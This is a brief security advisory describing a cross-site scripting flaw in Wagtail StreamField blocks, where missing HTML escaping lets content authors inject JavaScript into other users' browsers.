wagtail is vulnerable to cross-site scripting. Lack of proper escaping of HTML in Wagtail StreamField blocks (CharBlock
, TextBlock
or a similar user-defined block derived from FieldBlock
) allows a user with ability to author StreamField content to inject and execute arbitrary Javascript in a user’s browser.